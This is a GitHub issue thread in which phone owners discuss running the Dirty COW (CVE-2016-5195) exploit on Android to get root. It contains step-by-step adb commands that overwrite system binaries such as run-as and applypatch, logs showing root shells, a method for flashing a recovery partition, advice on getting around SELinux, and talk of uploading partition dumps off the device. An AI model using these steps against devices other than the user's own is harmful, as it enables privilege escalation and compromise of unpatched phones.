How can I use it?

[elgolondrino]

First of all thank you for exploit for privilege escalation! Could you tell me please how can I use it? I'm beginner, can anybody guide me through? Some say that some lines of code is missing for proper work. Is that true?

[joel0]

This is just a proof of concept that it's possible to obtain UID 0 (root), but on Android 4.4+ SELinux prevents this example from doing a full root. This is not a full solution for routing. If I understand what you are looking for, you shouldn't use your time using this example.

[jcadduono]

yeah i've tried so many things, unfortunately you're limited to what run-as is capable of for contexts....which is really just changing your UID lol. there's no way to change the context after that, since anything ran by the new run-as is still stuck in runas_exec context as well. shame because I really wanted to write/read to/from blocks! :P

I think if someone can find a context switch exploit then they could be combined into a mega security vulnerability!

[benzrad]

I just want to put my gapps' apk files under system/app, for my android doesn't allow zip flash, nor sideload success. yes, I got uid=0, then who helps directing push my gapps apks into systme/app? su can't run for no such file, remount system hence no way to allow modification. TIA.

[ghost]

Hi, I have an Samsung phone that runs on Jellybean. The problem is I can't root it with whatever methods available. Hence, is there a way to use this to achieve root?

[jcadduono]

@shanmukhateja i don't know if this binary will run on jelly bean as it's compiled for SDK 21, but you can try: https://build.nethunter.com/android-tools/dirtycow/armv7

adb push dirtycow /data/local/tmp
adb push cow-exec /data/local/tmp
adb shell
$ chmod 0777 /data/local/tmp/*
$ /data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/cow-exec
$ run-as -exec sh
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'sh' with 0 arguments

# (you are root)

you should now be root and be able to do whatever you want, remount your system and copy to it using (inside your adb shell as root):

# mount -o remount,rw /system
# cp /sdcard/whatever /system/wherever
# mount -o remount,ro /system

wonder if JB kernels are even vulnerable. I am able to do this on my Galaxy Explode7 with SELinux set to permissive.

My fork with cow-exec is here: https://github.com/jcadduono/CVE-2016-5195

[ghost]

Thank you. This may help :)

[ghost]

@jcadduono thanks I'm going to try it in a not permisissive SELinux. do you have anyway to set a none rooted selinux to permissive?

[jcadduono]

no I don't, you'll have to try to find ways to abuse policies for your use by replacing services available in init and using "start servicename"

I managed to hijack applypatch to write to partitions just now... :) LG V20 T-Mobile is saved by dirtycow! start flash_recovery <- the irony

[ghost]

@jcadduono
Thanks for all ill keep looking. I'm able to get root access using your cow-exec but fucking selinux don't even let me exec sh.... but run-as -exec toybox (some of the commands) works. I'm trying to find a way to flash unlock.img into mmcblk0p17 because this phone cant be unlocked or rooted by any other means since last OTA update

[ghost]

I was able to run-as -exec cat init.rc and found: service flash_recovery /system/bin/install-recovery.sh class main oneshot

but 1|shell@R1_HD:/system/bin $ run-as -exec cat install-recovery.sh Current uid: 2000 Setting capabilities Attempting to escalate to root Current uid: 0 Executing: 'cat' with 1 arguments

cat: install-recovery.sh: Permission denied

Can I dirtycow /system/bin/install-recovery.sh /data/local/tmp/myinstallscript.sh

where myinstallscript.sh is dd if=/sdcard/unlock.img of=/dev/block/mmcblk0p17

then run-as -exec start flash_recovery?

[jcadduono]

you cant replace shell scripts they are executed by sh which doesnt have context for flashing, you need to use a binary that flashes the partition to replace applypatch (and usually applypatch only has permissions to write to recovery partition, not any others)

[ghost]

@jcadduono dirtycow cant see install-recovery.sh ... will head home to complile your applypatch dirtycow to phones and see if I can flash twrp with it. eta 40 mins freaking traffic lol

[jcadduono]

just know that if you bootloader is locked you cant boot twrp no matter what

[jcadduono]

you'll need to set your recovery block device location in cow-applypatch-flash.c before compiling

adb push twrp.img /sdcard/recovery.img
adb push dirtycow /data/local/tmp
adb push cow-applyimage-flash /data/local/tmp
adb shell
$ chmod 0777 /data/local/tmp/dirtycow
$ /data/local/tmp/dirtycow /system/bin/applypatch /data/local/tmp/cow-applypatch-flash
$ setprop ctl.start flash_recovery
$ logcat | grep cow [i](you can see flash progress or failure with this)

[ghost]

@jcadduono if I have to unlock the bootloader first then I don't know what to do. I cant think a way to flash or dd unlock.img into /dev/block/mmcblk0p17.

[ghost]

@jcadduono setprop ctl.start flash_recovery Doesnt trigger anything...

The original method to unlock and root this phone was using spfts to flash recovery twrp then root and finally unlock bootloader. Since i took the ota without unlocking and rooting first im unenable to use the only known method. That is why i have spend the last 3 days trying to find a way with dirtycow. Phone is Blu R1 HD ota version 6.6v

[Zahin-10]

The binaries provided by @jcadduono aren't working for some reason I don't know why.This is the error message. CANNOT LINK EXECUTABLE: empty/missing DT_HASH in "/data/local/tmp/dirtycow" (built with --hash-style=gnu?)

I was using this because I couldnt compile the source files, I managed to install the NDK r13 but when i try build it says this.

[brandsjek]

using @jcadduono's binaries, run-as is in /system/bin, but it is 770 so I can't execute it. darn. help would be useful. Nexus 5x, 7.1 preview.

[jcadduono]

@Zahin-10 i missed the LOCAL_ in LOCAL_SDK_VERSION :$ you can redownload them, they should be compiled for 5.0 API right now which will probably allow them to run on KitKat - Nougat

if you want to try the changes from my repository, on an older API I suppose you'll need to compile them yourself.

wish I knew what your build issue was about, I use an android repository for building targets rather than just the ndk by itself. Could be a clang issue? Maybe you could try adding to the Makefile, to the ndk_build line with APP_PLATFORM:

NDK_TOOLCHAIN_VERSION=4.8

@Flippylosaurus yeah you'll have to look into other binaries I suppose, run-as isn't useful in any way. there might be some other binaries that have contexts with lots of permissions, and you can do things in the OS to have the system trigger them (making them root with a dangerous context, allowing you to exploit with them), rather than the shell triggering them as just runas context which can't do anything as root except see root files.

[ghost]

is there a way to see the contexts and permisions of every binary? i have people that rooted before the ota and can check if there is a way.

[jcadduono]

I've been using find /system/ -type f -exec ls -Z "{}" \; | grep _exec but it doesn't catch every scenario since yeah you can't see a lot of binaries and sometimes there's regular binaries executed by shell scripts from the system that don't have contexts but gain the contexts of their executor

[ghost]

127|shell@R1_HD:/data/local/tmp $ logcat | grep cow 10-26 23:11:44.049 4377 4377 I cow-applypatch-flash: Current uid: 0 10-26 23:11:44.049 4377 4377 I cow-applypatch-flash: Starting image flash... 10-26 23:11:44.049 4377 4377 I cow-applypatch-flash: Could not open input/output file as r/w!

so it works.... just need to find a file exec triggered by something that can write into /dev/block/mmcblk0p8 (recovery block) ... i dirtycow cow-applypatch it into dnsmasq and turned on wifi hotspot. and it gave me that lock.... I didn't edited applypatch for the file locations will do that tomorrow.

if it flash will it brick my bootloader locked phone?

[jcadduono]

it shouldnt brick it but you wont be able to boot your recovery, the whole point of bootloader locking is signature enforcement on android boot partitions, so if it's not signed, it won't boot the image

[ghost]

@jcadduono you are the best. just saw your recowvery-app_process64.c and recowvery-applypatch.c

how u trigger them? cant wait to try it on my blu.... your c code is very similar to the script made to unlock it before the last ota.

[serajr]

@jcadduono First of all thank you for exploit!! @timwr as well!!!

Your binaries (dirtycow and cow-exec) just worked on latest 6.0.1 (xperia stock fw), but I was on an already killed SELinux scenario. Got root shell, see output:

warning: new file size (13884) and file old size (17920) differ

size 17920

[*] mmap 0xb6dac000
[*] exploit (patch)
[*] currently 0xb6dac000=464c457f
[*] madvise = 0xb6dac000 17920
[*] madvise = 0 1048576
[*] /proc/self/mem 1610612736 1048576
[*] exploited 0xb6dac000=464c457f
shell@D5833:/ $ getenforce
Permissive
shell@D5833:/ $ run-as -exec sh
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'sh' with 0 arguments

shell@D5833:/ #

But on the same and untouched fw, output is:

warning: new file size (13884) and file old size (17920) differ

size 17920

[*] mmap 0xb6e06000
[*] exploit (patch)
[*] currently 0xb6e06000=464c457f
[*] madvise = 0xb6e06000 17920
[*] madvise = 0 1048576
[*] /proc/self/mem 1610612736 1048576
[*] exploited 0xb6e06000=464c457f
shell@D5833:/ $ getenforce
Enforcing
shell@D5833:/ $ run-as -exec sh
Current uid: 2000
Setting capabilities
Attempting to escalate to root
Current uid: 0
Executing: 'sh' with 0 arguments

Failed to execute 'sh'!
1|shell@D5833:/ $

I'd like to run a script stored at /data/local/tmp/script.sh (it worked before on first scenario I've described)

Is SELinux "Enforcing" the culprit? if so, is there a way to change it to "Permissive" before "run-as -exec sh" command? Or any other workaround?

Any help/advice would be great! Thanks in advance!!

[Zahin-10]

@jcadduono Thanks I redownloaded it but now there is another issue it kinda worked out but at last it shows this.

[brandsjek]

@jcadduono maybe this might help:

ndk-build NDK_TOOLCHAIN_VERSION=4.9 NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21
make[1]: Entering directory '/home/hillebrand/Software/ext_dirtycow'
[arm64-v8a] Executable     : cow-exec
./obj/local/arm64-v8a/objs/cow-exec/cow-exec.o: In function `main':
/home/hillebrand/Software/ext_dirtycow/./cow-exec.c:39: undefined reference to `__android_log_print'
/home/hillebrand/Software/ext_dirtycow/./cow-exec.c:52: undefined reference to `__android_log_print'
/home/hillebrand/Software/ext_dirtycow/./cow-exec.c:54: undefined reference to `__android_log_print'
/home/hillebrand/Software/ext_dirtycow/./cow-exec.c:57: undefined reference to `__android_log_print'
/home/hillebrand/Software/ext_dirtycow/./cow-exec.c:59: undefined reference to `__android_log_print'
./obj/local/arm64-v8a/objs/cow-exec/cow-exec.o:/home/hillebrand/Software/ext_dirtycow/./cow-exec.c:63: more undefined references to `__android_log_print' follow
collect2: error: ld returned 1 exit status
/home/hillebrand/Software/android-ndk-r13/build/core/build-binary.mk:715: recipe for target 'obj/local/arm64-v8a/cow-exec' failed
make[1]: *** [obj/local/arm64-v8a/cow-exec] Error 1
make[1]: Leaving directory '/home/hillebrand/Software/ext_dirtycow'
Makefile:5: recipe for target 'build' failed
make: *** [build] Error 2

[Sonic5317]

@serajr You said you got this working on the latest Xperia 6.0.1 was that by any chance on an Xperia XZ? I'm looking for root to be able to backup the phones TA partition.

[serajr]

@Sonic5317 yep, I got it working, but it is only a very limited spawned root shell with u:r:shell:s0 context. It has no previleges enough to dd/copy TA partition, unfortunately! But you can "debloat" your rom at least, by disabling packages in which a regular shell could not!! I will release my Xperia X line dirtycow debloat script soon (xda)!

I'm still working on it, and if maybe @dosomder (zxz0O0) could help us out on something (byeselinux on that context, if possible ofc - or trying to switch the context to init or system_server with a different approach), it would be great!!

Edit: @GetMe20002 how did you change the context to init and set selinux enforcing to permissive? What's your device/android version? Thanks in advance!! ;)

[dosomder]

@serajr app_process can switch context to system_server and load kernel modules (for example byeselinux). However, at least on 32bit when you crash app_process the phone reboots because of clmcheck.

You could load a modified app_process which takes over without crashing the process but this would be a device / firmware specific solution.

[serajr]

@dosomder thank you so much! You're right (as always), crashing app_process (app_process32) does reboot the phone (Z3C), and I suppose app_process64 as well. Do you think if somehow we manage to get system_server context we can temporarily insmod byeselinux.ko? Is that enough to run iovyroot's backup.sh succesfully? Forgime me, I'm a Windows guy.

The main goal with dirtycow vuln is being able to perform TA partition's backup of Xperia X line up, which kernels seem to be patched for iovyroot (I'm not pretty sure about that).

[dosomder]

@serajr You would have to verify the current selinux policies on the newer phones. At least on my Z3C, the system_server context is enough to load kernel modules and disable selinux which allows backup of TA partition.

[fuzun]

Does this trigger KNOX?

[serajr]

@dosomder I've also got u:r:netd:s0 (and netmgrd:s0) context, crashing ip binary. But I don't know if it has privileges enough to make copy (dd), and even if it does, it looks like it cannot write to the /sdcard nor /data. Is there a way to perform dd of TA and instead of write it to device, upload it out somehow (using curl maybe, or another approach)?

By the way, are you thinking about, or are you working on a new temp root tool using dirtycow (or another vuln)? I ask you that because you did a so such amazing job with giefroot and iovyroot, which imho, every xperia user owes you at least eternal gratitude!

Thanks in advance!

[dosomder]

@serajr I don't know if this context has permission to read TA partition, but you can indeed create a websocket and upload data over it to your computer for example.

I am not working on a root tool. I have limited time and it's not worth for me creating another tool at the moment.

[SerraraFluttershy]

How could I use this on a Kindle Fire HD 6 running Fire OS 5.3.1.1? @jcadduono And...is there any way I could install SuperSU without needing recovery?

[walkman4321]

@serajr I am also trying on samsung galaxy o7 android 6.0.1 $ make root ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=armeabi-v7a APP_PLATFORM=android-23 make[1]: Entering directory /home/rohitnew/xlastfilder/CVE-2016-5195-master' [armeabi-v7a] Compile thumb : dirtycow <= dirtycow.c [armeabi-v7a] Compile thumb : dirtycow <= dcow.c [armeabi-v7a] Executable : dirtycow [armeabi-v7a] Install : dirtycow => libs/armeabi-v7a/dirtycow [armeabi-v7a] Compile thumb : run-as <= dirtycow.c [armeabi-v7a] Compile thumb : run-as <= run-as.c [armeabi-v7a] Executable : run-as [armeabi-v7a] Install : run-as => libs/armeabi-v7a/run-as make[1]: Leaving directory/home/rohitnew/xlastfilder/CVE-2016-5195-master' adb push libs/armeabi-v7a/dirtycow /data/local/tmp/dcow [100%] /data/local/tmp/dcow adb shell 'chmod 777 /data/local/tmp/dcow' adb shell 'chmod 777 /data/local/tmp/dcow' adb push libs/armeabi-v7a/run-as /data/local/tmp/run-as [100%] /data/local/tmp/run-as adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as' dcow /data/local/tmp/run-as /system/bin/run-as warning: new file size (5544) and destination file size (17916) differ

[] size 17916 [] mmap 0xb6e14000 [] currently 0xb6e14000=464c457f [] using /proc/self/mem method [] madvise = 0xb6e14000 17916 [] madvise = 0 16777216 [] /proc/self/mem 1515137308 564025 [] exploited 0 0xb6e14000=464c457f

$ adb shell

shell@o7prolte:/ $ getenforce Enforcing 127|shell@o7prolte:/ $ run-as -exec sh
run-as: Package '-exec' is unknown

Is there any thing I am doing wrong Please help me

[ghost]

ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_ABI=arm64-v8a APP_PLATFORM=android-23 make[1]: Entering directory /home/xuan/CVE-2016-5195-master' [arm64-v8a] Install : dirtycow => libs/arm64-v8a/dirtycow [arm64-v8a] Install : run-as => libs/arm64-v8a/run-as make[1]: Leaving directory/home/xuan/CVE-2016-5195-master' adb push libs/arm64-v8a/dirtycow /data/local/tmp/dcow 26 KB/s (13856 bytes in 0.510s) adb shell 'chmod 777 /data/local/tmp/dcow' adb shell 'chmod 777 /data/local/tmp/dcow' adb push libs/arm64-v8a/run-as /data/local/tmp/run-as 57 KB/s (9760 bytes in 0.165s) adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as' dcow /data/local/tmp/run-as /system/bin/run-as warning: new file size (9760) and destination file size (14192) differ

[] size 14192 [] mmap 0x7f8d443000 [] currently 0x7f8d443000=10102464c457f [] using ptrace method

shell@F04G:/ $ run-as -exec sh run-as: Package '-exec' is unknown

[timwr]

Try make test, I don't think you're vulnerable. Your phone has the fix